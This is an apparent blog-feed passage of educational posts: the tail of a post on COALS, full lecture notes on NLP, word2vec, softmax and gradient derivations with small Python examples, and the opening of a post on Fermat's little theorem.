<p>We can use the log of the raw counts or cap the maximum count or
remove the function words to address this issue and such methods were
explored heavily in the 2000s.</p>
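<p>A minimal sketch of this pipeline with NumPy: scale the counts with a log, run the SVD, and keep only the largest singular values. The 4 x 4 count matrix is made up, and using <code>log(1 + count)</code> and <code>k = 2</code> are illustrative choices rather than anything prescribed here.</p>

```python
import numpy as np

# Hypothetical 4 x 4 co-occurrence counts; the first word behaves like a function word.
X = np.array([
    [0, 900, 800, 700],
    [900, 0, 12, 3],
    [800, 12, 0, 5],
    [700, 3, 5, 0],
], dtype=float)

scaled = np.log1p(X)  # log(1 + count) dampens the very large counts
U, singular_values, Vt = np.linalg.svd(scaled)

k = 2  # keep only the k largest singular values
word_vectors = U[:, :k] * singular_values[:k]
rank_k_approx = word_vectors @ Vt[:k]

print(singular_values)     # sorted from largest to smallest
print(word_vectors.shape)  # one k-dimensional vector per word
```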
<h4 id="coals">COALS</h4>
<p><img src="/extras/images/nlp-word2vec-algorithm/coals-hacks.png"/></p>
<p>Doug Rohde explored a number of these ideas for improving the
co-occurrence matrix in a model that he built called COALS. We
get the same kind of linear semantic components, which can be used to
identify analogies.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/coals-analogies.png"/></p>
<p>These vector components are not perfect, but are roughly parallel and
roughly the same size. So we have a meaning component there that we
could add on to another word for analogies: for example, we could
determine that drive is to driver as marry is to priest. This acted as
the basis for the GloVe model investigation.</p>
<h4 id="word2vec-implementation-code">Word2Vec Implementation Code</h4>
<h4 id="references">References</h4>
<ol type="1">
<li><a href="https://www.youtube.com/watch?v=gqaHkPEZAew">Video</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/slides/cs224n-2022-lecture02-wordvecs2.pdf">Slides</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/readings/cs224n-2019-notes02-wordvecs2.pdf">Notes</a></li>
</ol>Introduction to NLP and Word Vectors2022-03-16T00:00:00-07:002022-03-16T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-03-16:/posts/introduction-to-nlp-and-word-vectors.htmlA post about Introduction to NLP and basics of Word Vectors<p>This blog post and the following series captures the path of
understanding NLP, usage of Deep Learning in NLP and the various
algorithms, by roughly following the lecture patterns for the CS224n
course from Stanford.</p>
<h3 id="lecture-1-introduction-and-word-vectors">Lecture 1 –
Introduction and Word Vectors</h3>
<p>The following post is primarily about driving home the fact that a
word’s meaning can be represented, not perfectly but really rather well
by a large vector of real numbers. This has been an amazing find which
has taken research away from the traditional approaches followed before
deep learning.</p>
<h4 id="intent">Intent</h4>
<ol type="1">
<li>Foundation: a good, deep understanding of the effective modern
methods for deep learning applied to NLP.</li>
<li>Basics and key methods that are used in NLP: recurrent networks,
attention, transformers.</li>
<li>Ability to build systems in PyTorch.</li>
<li>Learning word meanings, dependency parsing, machine translation,
question answering.</li>
</ol>
<p><img alt="Source: xkcd: I Could Care Less" src="https://imgs.xkcd.com/comics/i_could_care_less.png" title="Source: xkcd: I Could Care Less" width="408"/></p>
<h4 id="language-model">Language model</h4>
<ol type="1">
<li><p>Building computational systems that try to get better at guessing
how their words will affect other people and what other people are
meaning by the words that they choose to say.</p></li>
<li><p>It is a system that was constructed by human beings relatively
recently in some sense.</p></li>
</ol>
<h4 id="how-do-word-vectors-work">How do word vectors work</h4>
<p>Language arose for human beings somewhere in the range of
100,000 to a million years ago, and that powerful communication between
human beings quickly set off our ascendancy over other creatures. It was
much more recently again that humans developed writing, which allowed
knowledge to be communicated across distances of time and space. So a
key question for artificial intelligence and human-computer interaction
is how to get computers to be able to understand the information
conveyed in human languages.</p>
<p>We need knowledge to understand language and people well, but it’s
also the case that a lot of that knowledge is contained in language
spread out across the books and web pages of the world.</p>
<p>So with recent advancements, machine translation works moderately
well. Learning other people’s languages was a human task which required
a lot of effort and concentration. But now to get news from Kenya we can
use Google to translate Swahili from a Kenyan website.</p>
<p><img alt="slide-google-translate" src="/extras/images/introduction-to-nlp-and-word-vectors/2022-03-18-11-07-20-image.png" title="" width="748"/></p>
<h4 id="gpt-3">GPT-3</h4>
<p>One of the biggest recent developments in NLP, including in the
popular media, was GPT-3, a huge new model released by
OpenAI. It is exciting because it has started to look like the first
step on the path to universal models, where we can train an extremely
large model on the world knowledge in human languages and on how to do
tasks. So we are no longer building one model to detect spam and another
to detect foreign language content, i.e. a separate supervised
classifier for every different task, since we have one model that
understands.</p>
<p>It is really good at predicting words. The two examples are explained
below.</p>
<ol type="1">
<li><p>Write about Elon Musk in the style of Doctor Seuss</p></li>
<li><p>Question prediction from a sentence using a couple of examples.
The model started predicting the questions after just two
examples.</p></li>
</ol>
<p>The way it generates more text is by predicting one word at a
time, adding each following word to complete its text.</p>
<p><strong>Another Example:</strong> Translating human language
sentences into SQL.</p>
<p><img alt="gpt-example" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-13-56-image.png" title="gpt-example" width="762"/></p>
<h4 id="what-is-language-and-its-meaning">What is language and its
meaning?</h4>
<p>How do we represent the meaning of a word? Webster’s dictionary
definition is really focused on the “word idea”, which is pretty close
to the most common way that linguists think about meaning:
<strong>denotational semantics</strong>, which captures word meaning as
a pairing between a word, which is a signifier or symbol, and the thing
that it signifies, which is an idea or thing.</p>
<p>So the meaning of the word chair is the set of things that are
chairs. The same term is also used, and similarly applied, for the
semantics of programming languages. Traditionally, meaning has been
handled in natural language processing systems by making use of
resources like dictionaries, and thesauri in particular. For
example, <strong>WordNet</strong> organizes words and terms into
both synonym sets, i.e. sets of words that can mean the same thing, and
hypernyms, which correspond to IS-A relationships.</p>
<h5 id="problem-with-wordnet">Problem with WordNet</h5>
<p>In WordNet, “proficient” is listed as a synonym for “good”, which is
accurate only in some contexts. WordNet is also limited as a human
constructed thesaurus: it is difficult to keep up to date with more
current terminology. For example, “wicked” is there for the wicked
witch, but not for more modern colloquial uses. “Ninja” is another
example where WordNet is not kept up to date. So it requires a lot of
human labor, and even then, it has sets of synonyms but does not really
have a good sense of words that mean something similar. This idea of
meaning similarity is something that would be really useful to make
progress on, and it is where deep learning models excel.</p>
<h5 id="problem-with-traditional-nlp">Problem with traditional NLP</h5>
<p>The problem with traditional NLP is that words are regarded as
discrete symbols. Symbols like hotel, conference and motel are words,
which in deep learning are referred to as a localized representation. In
statistical machine learning systems, these symbols need to be
represented numerically, for example to build a logistic regression
model with words as features, and this is typically done with a one-hot
encoded vector.</p>
<h4 id="one-hot-encoding-vector">One hot encoding vector</h4>
<p>A one-hot encoding vector has a dimension for each different word. So
that means that we need huge vectors corresponding to the number of
words in our vocabulary. A high school English dictionary probably has
about 250,000 words in it, and covering words beyond that would probably
need a 500,000 dimensional vector. But the bigger problem with
discrete symbols is that there is no notion of word relationships and
similarity. For example, if a user searches for “Seattle motel”, it
should match documents containing “Seattle hotel” as well. But in a
mathematical sense, the one-hot vectors for “motel” and “hotel” are
orthogonal, so there is no natural notion of similarity between
them.</p>
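<p>The orthogonality is easy to verify on a toy vocabulary. The four-word vocabulary and the <code>one_hot</code> helper below are made up for illustration.</p>

```python
import numpy as np

vocab = ["seattle", "hotel", "motel", "conference"]


def one_hot(word):
    """Vector of zeros with a single 1 at the word's position in the vocabulary."""
    vec = np.zeros(len(vocab))
    vec[vocab.index(word)] = 1.0
    return vec


hotel, motel = one_hot("hotel"), one_hot("motel")
print(hotel @ motel)  # 0.0: the vectors of two different words never overlap
print(hotel @ hotel)  # 1.0: a word only matches itself
```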
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-27-00-image.png"/></p>
<h4 id="word-embeddings">Word Embeddings</h4>
<blockquote>
<p>You shall know a word by the company it keeps. - J. R. Firth</p>
</blockquote>
<p>Modern deep learning methods allow encoding similarity in the real
valued vectors themselves. The basis is <strong>distributional
semantics</strong>, where a word’s meaning is given by the words that
frequently appear close to it. Representing a sense for words in this
way, with <strong>meaning as a notion of what context it appears
in</strong>, has been a very successful idea. It proves to be an
extremely computational sense of semantics, which has led to it being
used everywhere very successfully in deep learning systems. When a word
appears in a text, it has a context, which is the set of words that
appear along with it.</p>
<h5 id="example---banking">Example - “banking”</h5>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-38-34-image.png"/></p>
<p>The word “banking” occurs in text, and the nearby words (context
words) in some sense represent the meaning of the word banking. Based on
the words that occur in context, we want to build a dense real valued
vector for each word that in some sense represents the meaning of that
word. It represents the meaning in the sense that the vector is useful
for predicting other words that occur in the context.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-42-28-image.png"/></p>
<p>A simple 8-dimensional illustration (<em>in reality, usually 300
dimensional vectors are used</em>) of the neural word representations
or “word embeddings”. This is a distributed representation, not a
localized representation, because the meaning of the word banking is
spread over all the dimensions of the vector. These are called word
embeddings because, given a group of words, these representations place
them in a high dimensional vector space, and so they’re embedded into
that space.</p>
<h4 id="introduction-to-word2vec">Introduction to word2vec</h4>
<p>Word2Vec was introduced by <strong>Tomas Mikolov and
colleagues</strong> in 2013 as a framework for learning word vectors. It
uses a lot of text, commonly referred to as a corpus (from the
Latin word for body, meaning a body of text), with a vocabulary size
of, say, 400,000, and creates a vector for every word. To determine the
best vector for each word, we can learn these word vectors from just a
big pile of text by doing this distributional similarity task of being
able to predict what words occur in the context of other words.
Specifically, going through the text and using a center word C and
context words O, we calculate the probability of a context word
occurring given the center word according to our current model. Since
the corpus is available, we know which words actually occur in the
context of that center word, so we can keep adjusting the word vectors
to maximize the probability assigned to words that actually occur in
the context of the center word as we proceed through the text.</p>
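<p>The first step of that procedure, walking through the text and pairing each center word with the words in its window, can be sketched as follows. The sample sentence, the window size of 2 and the function name <code>center_context_pairs</code> are illustrative assumptions.</p>

```python
def center_context_pairs(tokens, window_size):
    """Yield (center, context) pairs for every position in the token list."""
    for t, center in enumerate(tokens):
        start = max(0, t - window_size)
        stop = min(len(tokens), t + window_size + 1)
        for j in range(start, stop):
            if j != t:
                yield center, tokens[j]


tokens = "problems turning into banking crises as".split()
pairs = list(center_context_pairs(tokens, window_size=2))

# Context words seen when "into" is the center word.
print([context for center, context in pairs if center == "into"])
```

<p>Training then adjusts the vectors so that each of these observed pairs receives a higher probability under the model.</p>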
<p><img alt="word-vector-window" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-54-10-image.png" title="" width="369"/>
<img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-55-03-image.png"/></p>
<h4 id="determining-the-probability-of-a-word-occurring-in-the-context-of-a-given-center-word">Determining
the probability of a word occurring in the context of a given center
word</h4>
<p>For each position in the corpus, we want to predict context words
within a window of fixed size, given the center word W<sub>j</sub></p>
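<p>As a minimal sketch of this windowing step, the snippet below lists
every (center, context) pair for a fixed window size. The function name
<code>context_pairs</code> and the example sentence are illustrative
assumptions, not part of word2vec itself.</p>

```python
def context_pairs(tokens, window_size):
    """Yield (center, context) pairs for every position in the token list."""
    for t, center in enumerate(tokens):
        lo = max(0, t - window_size)
        hi = min(len(tokens), t + window_size + 1)
        for j in range(lo, hi):
            if j != t:  # the center word is not its own context
                yield center, tokens[j]


# Hypothetical example sentence, already split into tokens.
tokens = "problems turning into banking crises as".split()
pairs = list(context_pairs(tokens, window_size=2))

for center, context in pairs:
    print(center, context)
```

<p>Words near the start or end of the text simply get fewer context
words, because the window is clipped at the boundaries.</p>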
<p>Ideally, the model should give high probability to the words that
actually occur in the context. The likelihood measures how well the
model predicts words in the context of other words, and it is defined in
terms of the word vectors, which form the parameters of our model. It is
the product, over each word used as the center word and over each
context word in its window, of the probability of predicting that
context word given the center word. To learn this model, we define an
objective function (also called a cost or a loss) to optimize, which
essentially means to <strong>maximize the likelihood of the context we
see around center words.</strong></p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-12-00-56-image.png"/></p>
<p>The following changes are made to the objective function:</p>
<ol type="1">
<li><p>Use the log likelihood to convert all the products into
sums.</p></li>
<li><p>Use the average log likelihood, i.e. scale by <em>1/T</em>, where
T is the number of positions in the corpus.</p></li>
<li><p>Negate it, so that minimizing our objective function <span class="math inline"><em>J</em>(<em>θ</em>)</span> is equivalent to
maximizing our predictive accuracy.</p></li>
</ol>
<blockquote>
<p>Note: Each word has two word vectors: one for when it is used as the
center word, and a different one for when it is used as a context word.
This simplifies the math and the optimization and makes building word
vectors a lot easier.</p>
</blockquote>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-12-07-40-image.png"/></p>
<h4 id="likelihood-probability-calculation">Likelihood Probability
Calculation</h4>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-12-09-03-image.png"/></p>
<p>For a particular center word v<sub>c</sub> and a particular context
word u<sub>o</sub>, look up the vector representation of each word, and
take the dot product of those two vectors.</p>
<blockquote>
<p>Dot product is a natural measure of similarity between words because
each dimension contributes one component to the dot product sum. If both
components are positive, or both are negative, the term adds to the dot
product sum. If one is positive and one is negative, it subtracts from
the similarity measure. If either of them is zero, the similarity does
not change.</p>
</blockquote>
<p><strong>if two words have a larger dot product, that means they’re
more similar.</strong></p>
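<p>A small sketch of the dot product as a similarity score follows. The
four-dimensional vectors are made-up numbers chosen for illustration,
not real embeddings.</p>

```python
def dot(u, v):
    """Sum of the component-wise products of two equal-length vectors."""
    return sum(a * b for a, b in zip(u, v))


# Made-up vectors: bread and croissant agree in sign in every dimension,
# while carburetor has the opposite sign in every dimension.
bread = [-0.7, 0.9, -0.3, 0.5]
croissant = [-0.6, 0.8, -0.4, 0.3]
carburetor = [0.5, -0.7, 0.2, -0.6]

similar = dot(bread, croissant)     # every term adds to the sum
dissimilar = dot(bread, carburetor)  # every term subtracts from the sum
print(similar, dissimilar)
```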
<h4 id="softmax-function">Softmax function</h4>
<p>The next step is to turn these dot products into a probability
distribution. To avoid negative values, exponentiate each dot product,
then normalize by dividing by the sum of the same exponentiated quantity
over every word in the vocabulary. This ensures that each value lies
between 0 and 1 and that the values sum to 1. This is the softmax
function, which takes any vector in R<sup>n</sup> and turns it into a
probability distribution.</p>
<ol type="1">
<li><p>“max” term - exponentiation accentuates the largest scores across
the different dimensions of the similarity calculation, so the most
similar words receive most of the probability mass.</p></li>
<li><p>“soft” term - smaller scores still receive some probability, so
the result is a probability distribution over the possible words rather
than a single winner.</p></li>
</ol>
<blockquote>
<p>The max function returns just the single biggest term, whereas
softmax takes a set of numbers, scales them, and returns a probability
distribution.</p>
</blockquote>
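<p>The softmax described above can be sketched in a few lines of plain
Python. Subtracting the largest score before exponentiating is a common
numerical-stability trick and an addition of this sketch; it does not
change the result.</p>

```python
import math


def softmax(scores):
    """Turn arbitrary real scores into a probability distribution."""
    shift = max(scores)  # keeps exp() from overflowing on large scores
    exps = [math.exp(s - shift) for s in scores]
    total = sum(exps)
    return [e / total for e in exps]


probs = softmax([2.0, 1.0, -1.0])
print(probs)
```

<p>The largest score gets the largest share, but every entry keeps a
non-zero probability, which is the contrast with a plain max.</p>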
<h4 id="construct-word-vectors">Construct word vectors</h4>
<p>The plan is to optimize the word vectors to minimize the loss
function, i.e. maximize the probability of the words that were actually
in the context of the center word. <span class="math inline"><em>θ</em></span> represents all of the model
parameters in one very long vector. For this model, the word vectors are
the only parameters. Each word has two vectors, a context vector and a
center vector, and each of those is a D dimensional vector, where D
might be 300, and there are V words in the vocabulary. So the
model is of size <span class="math inline">2 * <em>D</em> * <em>V</em></span>. For a
vocabulary of size 500k and 300 dimensional vectors, that is 300 million
parameters to train in order to maximize the prediction of context
words.</p>
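<p>The parameter count follows directly from the formula; the variable
names below are only for illustration.</p>

```python
V = 500_000  # vocabulary size
D = 300      # dimensions per word vector

# Two vectors per word (center and context), D numbers in each.
num_parameters = 2 * D * V
print(num_parameters)
```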
<h4 id="multivariate-calculus">Multivariate Calculus</h4>
<p>The derivatives of the loss can be computed using multivariate
calculus, and the loss is then minimized by walking downhill along the
gradient using stochastic gradient descent. The objective <span class="math inline"><em>J</em>(<em>θ</em>)</span> that we need to
minimize is the average negative log likelihood. To compute <span class="math inline"><em>J</em>(<em>θ</em>)</span>, we iterate
through every position in the corpus and, for each one, through the M
words on both sides of the center word (excluding the center word
itself), adding up the log probability of the context word at that
position given the word that’s in the center
position <span class="math inline"><em>t</em></span>.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-11-37-image.png"/></p>
<p>Probability <span class="math inline"><em>P</em>(<em>o</em>|<em>c</em>)</span> is the
softmax of the dot product <span class="math inline"><em>u</em><sub><em>o</em></sub> ⋅ <em>v</em><sub><em>c</em></sub></span>:
the exponentiated dot product, normalized by the sum of the
exponentiated dot products of the center vector with the context vector
of every word in the vocabulary. To compute the gradient, the partial
derivative of this expression is taken with respect to every parameter
in the model, i.e. every component of the center and context vectors of
every word.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-19-25-image.png"/></p>
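<p>A minimal sketch of these two quantities, assuming a tiny vocabulary
of word ids and randomly initialized vectors. The names <code>U</code>
(context vectors), <code>V</code> (center vectors) and the toy corpus are
assumptions made for this example.</p>

```python
import math
import random


def dot(u, v):
    return sum(a * b for a, b in zip(u, v))


def prob_context_given_center(o, c, U, V):
    """P(o|c): softmax over the scores u_w . v_c for every word w."""
    scores = [dot(u_w, V[c]) for u_w in U]
    shift = max(scores)  # numerical stability only
    exps = [math.exp(s - shift) for s in scores]
    return exps[o] / sum(exps)


def objective(corpus, U, V, m):
    """J(theta): average negative log likelihood over all T positions."""
    T = len(corpus)
    total = 0.0
    for t, c in enumerate(corpus):
        for j in range(-m, m + 1):
            if j != 0 and 0 <= t + j < T:  # skip the center word itself
                total += math.log(prob_context_given_center(corpus[t + j], c, U, V))
    return -total / T


random.seed(0)
vocab_size, dim = 5, 4
U = [[random.uniform(-0.5, 0.5) for _ in range(dim)] for _ in range(vocab_size)]
V = [[random.uniform(-0.5, 0.5) for _ in range(dim)] for _ in range(vocab_size)]
corpus = [0, 1, 2, 3, 4, 1, 2, 0]  # toy corpus of word ids

loss = objective(corpus, U, V, m=2)
print(loss)
```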
<p>Walking through this in steps, start with the partial derivative with
respect to the center word vector (<em>a 300 dimensional word
vector</em>). Treating the expression as A/B, taking the log turns it
into log A minus log B. The log A term is just the dot product <span class="math inline"><em>u</em><sub><em>o</em></sub> ⋅ <em>v</em><sub><em>c</em></sub></span>, so its partial derivative with respect to <span class="math inline"><em>v</em><sub><em>c</em></sub></span> is simply
<span class="math inline"><em>u</em><sub><em>o</em></sub></span>.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-31-59-image.png"/></p>
<p>The derivative of the denominator term, log B, is computed using the
chain rule, working from the outside function to the inside one. The
image above gives a cleaner explanation.</p>
<p>Combining the expressions and moving the sum over
<code>w = 1 to V</code> inside the sum in the numerator, we end up with
exactly the softmax probability formula that we saw when we started. So
the derivative more conveniently becomes <span class="math inline"><em>u</em><sub><em>o</em></sub></span> minus the sum over
<code>x = 1 to V</code> of the probability of x given c times <span class="math inline"><em>u</em><sub><em>x</em></sub></span>.</p>
<p>That remaining sum is an <strong>expectation.</strong></p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-34-13-image.png"/></p>
<p>It is an average over all the context vectors, weighted by their
probability according to the model. This is always the case with
softmax style models: the derivative is the observed minus the expected.
So the model is good if on average it predicts exactly the word vector
that we actually see.</p>
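<p>The "observed minus expected" form can be checked numerically. The
sketch below compares the analytic gradient of log P(o|c) with respect to
the center vector against a central finite-difference estimate; the
random vectors and helper names are assumptions for illustration.</p>

```python
import math
import random


def dot(u, v):
    return sum(a * b for a, b in zip(u, v))


def log_prob(o, v_c, U):
    """log P(o|c) = u_o . v_c - log(sum_w exp(u_w . v_c))."""
    scores = [dot(u, v_c) for u in U]
    shift = max(scores)
    log_norm = shift + math.log(sum(math.exp(s - shift) for s in scores))
    return scores[o] - log_norm


def grad_wrt_center(o, v_c, U):
    """Analytic gradient: observed u_o minus the expected context vector."""
    scores = [dot(u, v_c) for u in U]
    shift = max(scores)
    exps = [math.exp(s - shift) for s in scores]
    total = sum(exps)
    probs = [e / total for e in exps]
    expected = [sum(p * u[d] for p, u in zip(probs, U)) for d in range(len(v_c))]
    return [U[o][d] - expected[d] for d in range(len(v_c))]


random.seed(1)
U = [[random.uniform(-1, 1) for _ in range(3)] for _ in range(6)]
v_c = [random.uniform(-1, 1) for _ in range(3)]
o = 2

analytic = grad_wrt_center(o, v_c, U)

# Central finite differences, one dimension of v_c at a time.
eps = 1e-6
numeric = []
for d in range(len(v_c)):
    plus = v_c[:d] + [v_c[d] + eps] + v_c[d + 1:]
    minus = v_c[:d] + [v_c[d] - eps] + v_c[d + 1:]
    numeric.append((log_prob(o, plus, U) - log_prob(o, minus, U)) / (2 * eps))

max_error = max(abs(a - n) for a, n in zip(analytic, numeric))
print(max_error)
```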
<p>The next step is to adjust the parameters of our model to make the
probability estimates as high as we possibly can, using stochastic
gradient descent.</p>
<h4 id="gensim">Gensim</h4>
<p>Gensim is a package often used for word vectors; it’s not really
used for deep learning. For testing, GloVe word vectors were used, by
loading the 100 dimensional word vectors.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-46-10-image.png"/></p>
<p>Checking the first 10 dimensions of the word vectors for
<em>bread</em> and <em>croissant</em> shows that these two words are
somewhat similar: both of them are negative in the first dimension,
positive in the second, negative in the third, positive in the fourth,
negative in the fifth and so on. So they should have a fairly large dot
product, which is what we want because bread and croissant are similar.
A few more examples:</p>
<ol type="1">
<li><p>Similar to banana</p></li>
<li><p>Similar to brioche</p></li>
<li><p>Similar to USA</p></li>
</ol>
<p><img alt="most-similar-banana" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-47-48-image.png" title="most-similar-banana" width="282"/>
<img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-48-24-image.png"/>
<img alt="most-similar-usa" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-49-08-image.png" title="" width="297"/></p>
<h4 id="analogy-task">Analogy task</h4>
<p>In the analogy task, we start with a word like
<strong><em>king</em></strong>, subtract out the male component, add
back in a female component, and then ask for the closest word, which
should be the word
<strong><em>queen</em></strong>.</p>
<p>A few other examples are illustrated below using Gensim.</p>
<p><img alt="analogy-example" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-50-13-image.png" title="" width="393"/>
<img alt="analogy-example" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-53-34-image.png" title="" width="400"/></p>
<p>Even linguistic analogies work, such as tall is to tallest as long is
to longest.</p>
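<p>The vector arithmetic behind the analogy task can be sketched without
any library. The vectors below are hand-made toy values with axes chosen
as (royalty, male, female, food); they are not trained embeddings and
this is not the Gensim API, only an illustration of the idea.</p>

```python
import math


def cosine(u, v):
    """Cosine similarity between two non-zero vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    return dot / (math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v)))


# Hand-made toy vectors, axes: (royalty, male, female, food).
vectors = {
    "king": [1.0, 1.0, 0.0, 0.0],
    "queen": [1.0, 0.0, 1.0, 0.0],
    "man": [0.0, 1.0, 0.0, 0.0],
    "woman": [0.0, 0.0, 1.0, 0.0],
    "prince": [0.8, 1.0, 0.0, 0.0],
    "bread": [0.0, 0.1, 0.1, 1.0],
}


def analogy(a, b, c):
    """Return the word d such that a is to b as c is to d."""
    target = [vb - va + vc for va, vb, vc in zip(vectors[a], vectors[b], vectors[c])]
    # The three input words are excluded from the candidates.
    candidates = [w for w in vectors if w not in (a, b, c)]
    return max(candidates, key=lambda w: cosine(vectors[w], target))


result = analogy("man", "king", "woman")
print(result)
```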
<h4 id="why-two-different-vectors">Why two different vectors</h4>
<p>Recall that the equation for <span class="math inline"><em>J</em>(<em>θ</em>)</span> is a sum over
every word appearing as the center word, and inside it a second sum over
each word in the context of that center word. Each term of the objective
function therefore involves one particular center word and one
particular context word. If the window contains the same word as both
the center word and a context word, a single shared vector would appear
in both roles in the same term, which complicates the derivatives.
Taking them as separate vectors ensures that this issue does not occur.
The two vectors end up very similar, but not identical, due to technical
reasons such as words occurring at the ends of documents and other
similar differences.</p>
<p>The usual method (followed for word2vec algorithm) is to average
those two vectors and consider the average vector as the representation
of the word.</p>
<h4 id="question-how-about-words-with-multiple-meanings-homonyms-and-common-words">Question:
How about words with multiple meanings (Homonyms) and common words</h4>
<ol type="1">
<li><p>For a word like <strong>star</strong>, which can be an
astronomical object or a movie star, taking all those uses of the word
and collapsing them together into one word vector actually turns out to
work rather well.</p></li>
<li><p>For very common words that linguists refer to as
<strong>function words</strong>, which include words like
<em>so</em> and <em>not</em> and prepositions such as <em>to</em> and
<em>on</em>, the suspicion is that the word vectors would not work
very well because they occur in all kinds of different contexts. However,
large language models do a great job on those words as well.</p></li>
</ol>
<h4 id="conclusion">Conclusion</h4>
<p>Another feature of the word2vec model is that it ignores the position
of words, i.e., it predicts every word around the center word, before or
after, one or two positions away in either direction, using the same
probability function. This limits its ability to capture the subtleties
of common grammatical words, such as whether they do or do not occur at
the end of a sentence. We can build slightly different models that are
more sensitive to the structure of sentences and perform better in
these cases. So word2vec is more of a framework for building word
vectors, and there are several variant algorithms within the framework.
One choice between variants is whether to predict the context words from
the center word (the skip-gram model) or the center word from the
context words (the continuous bag of words model).</p>
<p>So to learn word vectors, we start off with two vectors for each word
type, one for its role as a center word and one for its role as an
outside (context) word, and initialize them randomly, placing small
randomly generated numbers in each vector component. That’s just the
starting point. From there we use an iterative algorithm that
progressively updates those word vectors, so they do a better job at
predicting which words appear in the context of other words. We do that
using the gradients: once we have a gradient, we walk in the opposite
direction of the gradient, i.e. downhill, which minimizes our loss, and
repeat until our word vectors get as good as possible.</p>
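<p>The loop described above can be sketched end to end on a toy corpus.
This is a minimal illustration using a full softmax and per-pair updates,
not the optimized word2vec implementation; the corpus, dimensionality,
learning rate and function names are all assumptions, and the loss here
is averaged over (center, context) pairs.</p>

```python
import math
import random


def dot(u, v):
    return sum(a * b for a, b in zip(u, v))


def softmax(scores):
    shift = max(scores)
    exps = [math.exp(s - shift) for s in scores]
    total = sum(exps)
    return [e / total for e in exps]


def training_pairs(ids, m):
    """All (center, context) id pairs within a window of m words."""
    return [(ids[t], ids[t + j]) for t in range(len(ids))
            for j in range(-m, m + 1) if j != 0 and 0 <= t + j < len(ids)]


def average_loss(pairs, U, V):
    """Average negative log probability of the observed context words."""
    return -sum(math.log(softmax([dot(u, V[c]) for u in U])[o])
                for c, o in pairs) / len(pairs)


def sgd_step(c, o, U, V, lr):
    """One gradient step on -log P(o|c) for a single (center, context) pair."""
    v_c = V[c]
    probs = softmax([dot(u, v_c) for u in U])
    # Gradient w.r.t. v_c: expected context vector minus the observed one.
    grad_v = [sum(p * u[d] for p, u in zip(probs, U)) - U[o][d]
              for d in range(len(v_c))]
    # Gradient w.r.t. each u_w: (P(w|c) - [w == o]) * v_c.
    for w, u in enumerate(U):
        coeff = probs[w] - (1.0 if w == o else 0.0)
        for d in range(len(u)):
            u[d] -= lr * coeff * v_c[d]
    for d in range(len(v_c)):
        v_c[d] -= lr * grad_v[d]


random.seed(0)
words = "the cat sat on the mat the dog sat on the rug".split()
vocab = sorted(set(words))
ids = [vocab.index(w) for w in words]
dim = 8

# Random initialization: one center vector (V) and one context vector (U) per word.
V = [[random.uniform(-0.5, 0.5) for _ in range(dim)] for _ in vocab]
U = [[random.uniform(-0.5, 0.5) for _ in range(dim)] for _ in vocab]

pairs = training_pairs(ids, m=1)
initial_loss = average_loss(pairs, U, V)
for epoch in range(200):
    for c, o in pairs:
        sgd_step(c, o, U, V, lr=0.1)
final_loss = average_loss(pairs, U, V)
print(initial_loss, final_loss)
```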
<h4 id="suggested-reading">Suggested reading</h4>
<ol type="1">
<li><a href="http://arxiv.org/pdf/1301.3781.pdf">Efficient Estimation of
Word Representations in Vector Space</a> (original word2vec paper)</li>
<li><a href="http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf">Distributed
Representations of Words and Phrases and their Compositionality</a>
(negative sampling paper)</li>
</ol>
<h4 id="references">References</h4>
<ol type="1">
<li><a href="https://www.youtube.com/watch?v=8rXD5-xhemo">Video</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/slides/cs224n-2022-lecture01-wordvecs1.pdf">Slides</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/readings/cs224n-2019-notes01-wordvecs1.pdf">Notes</a></li>
</ol>Using Fermat’s little theorem for modular arithmetic2022-01-19T00:00:00-08:002022-01-19T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2022-01-19:/posts/using-fermats-little-theorum-for-modular-arithmetic.htmlThis post discusses Fermat’s little theorem and its usage in modular arithmetic<p>Fermat’s little theorem is a fundamental theorem for modular
arithmetic problems and provides a neat little trick for finding the
remainder for division by large numbers.</p>
<h4 id="from-wikipedia">From Wikipedia</h4>
<p><a href="https://en.wikipedia.org/wiki/Fermat%27s_little_theorem">Fermat’s
little theorem</a> states that if p is a prime number, then for any
integer a, the number <span class="math inline"><em>a</em><sup><em>p</em></sup> − <em>a</em></span>
is an integer multiple of p. In the notation of modular arithmetic, this
is expressed as</p>
<p><span class="math display"><em>a</em><sup><em>p</em></sup> ≡ <em>a</em> (mod <em>p</em>).</span></p>
<ol type="1">
<li>Using Fermat’s little theorem for modular arithmetic, we know
that <span class="math inline"><em>a</em><sup><em>p</em></sup> ≡ <em>a</em> (mod <em>p</em>)</span></li>
<li>Dividing by a on both sides, <span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup> ≡ 1 (mod <em>p</em>)</span>
for all <span class="math inline">1 ≤ <em>a</em> ≤ <em>p</em> − 1</span></li>
